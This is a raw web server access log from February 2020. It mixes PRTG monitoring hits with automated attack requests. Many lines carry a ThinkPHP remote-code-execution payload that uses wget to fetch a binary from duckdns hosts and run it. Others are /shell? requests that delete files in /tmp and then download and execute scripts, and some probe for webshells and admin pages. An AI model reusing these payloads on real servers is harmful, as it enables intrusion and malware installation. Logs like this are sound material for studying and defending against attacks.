212.91.246.72 - - [04/Feb/2020:17:23:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
73.138.205.198 - - [04/Feb/2020:17:24:40 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:24:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.94.43.32 - - [04/Feb/2020:17:25:30 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:25:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.56.126 - - [04/Feb/2020:17:25:51 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
42.118.195.95 - - [04/Feb/2020:17:26:06 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:26:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:27:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.52.24.163 - - [04/Feb/2020:17:28:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
117.1.93.82 - - [04/Feb/2020:17:28:08 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:28:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.112.103.22 - - [04/Feb/2020:17:29:10 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:29:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:30:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.229.232.25 - - [04/Feb/2020:17:31:14 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:31:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.80.29.31 - - [04/Feb/2020:17:32:08 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
82.112.32.143 - - [04/Feb/2020:17:32:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:17:32:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.48.153 - - [04/Feb/2020:17:33:03 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:33:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:34:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:35:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.43.218.157 - - [04/Feb/2020:17:36:11 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:36:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.44.138.98 - - [04/Feb/2020:17:36:45 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
58.187.209.32 - - [04/Feb/2020:17:37:34 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:37:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:38:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.162.230.187 - - [04/Feb/2020:17:38:55 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:39:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.138.207.237 - - [04/Feb/2020:17:39:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
85.105.223.101 - - [04/Feb/2020:17:39:51 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Karu/2.0"
88.247.102.232 - - [04/Feb/2020:17:39:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:17:40:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.84.11.202 - - [04/Feb/2020:17:41:16 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
164.68.112.178 - - [04/Feb/2020:17:41:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
164.68.112.178 - - [04/Feb/2020:17:41:30 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:17:41:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.68.112.178 - - [04/Feb/2020:17:41:44 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
164.68.112.178 - - [04/Feb/2020:17:41:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
164.68.112.178 - - [04/Feb/2020:17:41:50 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
164.68.112.178 - - [04/Feb/2020:17:41:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
217.76.42.78 - - [04/Feb/2020:17:42:12 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:42:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:43:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.89.177.83 - - [04/Feb/2020:17:43:49 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
31.162.221.38 - - [04/Feb/2020:17:44:17 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:44:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.114.24.175 - - [04/Feb/2020:17:45:20 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:45:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:46:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.165.70.108 - - [04/Feb/2020:17:46:45 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:47:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:48:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:49:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.59.162.149 - - [04/Feb/2020:17:49:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [04/Feb/2020:17:50:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:51:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
70.95.63.117 - - [04/Feb/2020:17:52:33 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:52:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:53:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:54:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.162.192.10 - - [04/Feb/2020:17:54:59 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
178.88.83.87 - - [04/Feb/2020:17:55:25 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:55:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.71.213.249 - - [04/Feb/2020:17:56:12 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:17:56:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:17:57:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.20.66 - - [04/Feb/2020:17:58:31 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [04/Feb/2020:17:58:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.188.210.101 - - [04/Feb/2020:17:59:36 +0100] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:17:59:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.188.210.101 - - [04/Feb/2020:18:00:23 +0100] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:18:00:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.188.210.101 - - [04/Feb/2020:18:00:46 +0100] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
5.188.210.101 - - [04/Feb/2020:18:00:58 +0100] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
171.229.214.185 - - [04/Feb/2020:18:01:29 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:18:01:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.143.127.9 - - [04/Feb/2020:18:02:02 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
164.68.112.178 - - [04/Feb/2020:18:02:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
183.80.220.15 - - [04/Feb/2020:18:02:34 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
164.68.112.178 - - [04/Feb/2020:18:02:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
164.68.112.178 - - [04/Feb/2020:18:02:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
5.188.210.101 - - [04/Feb/2020:18:02:37 +0100] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:18:02:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:18:03:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.51.64.124 - - [04/Feb/2020:18:04:19 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:18:04:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.51.7.129 - - [04/Feb/2020:18:04:55 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
198.108.66.64 - - [04/Feb/2020:18:05:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
106.13.88.214 - - [04/Feb/2020:18:05:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
106.13.88.214 - - [04/Feb/2020:18:05:24 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
106.13.88.214 - - [04/Feb/2020:18:05:26 +0100] "POST /Admin56f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
212.91.246.72 - - [04/Feb/2020:18:05:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:05:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:05:48 +0100] "GET /l.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:05:49 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:05:50 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
106.13.88.214 - - [04/Feb/2020:18:05:50 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
106.13.88.214 - - [04/Feb/2020:18:06:11 +0100] "POST /bbs.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
106.13.88.214 - - [04/Feb/2020:18:06:35 +0100] "POST /forum.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
212.91.246.72 - - [04/Feb/2020:18:06:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:06:59 +0100] "POST /forums.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
106.13.88.214 - - [04/Feb/2020:18:07:23 +0100] "POST /bbs/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
212.91.246.72 - - [04/Feb/2020:18:07:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:07:47 +0100] "POST /forum/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
106.13.88.214 - - [04/Feb/2020:18:08:15 +0100] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
106.13.88.214 - - [04/Feb/2020:18:08:23 +0100] "GET /java.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:32 +0100] "GET /_query.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:32 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:35 +0100] "GET /db_cts.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:35 +0100] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:35 +0100] "GET /logon.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:35 +0100] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:36 +0100] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:36 +0100] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:37 +0100] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:37 +0100] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:39 +0100] "GET /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:39 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
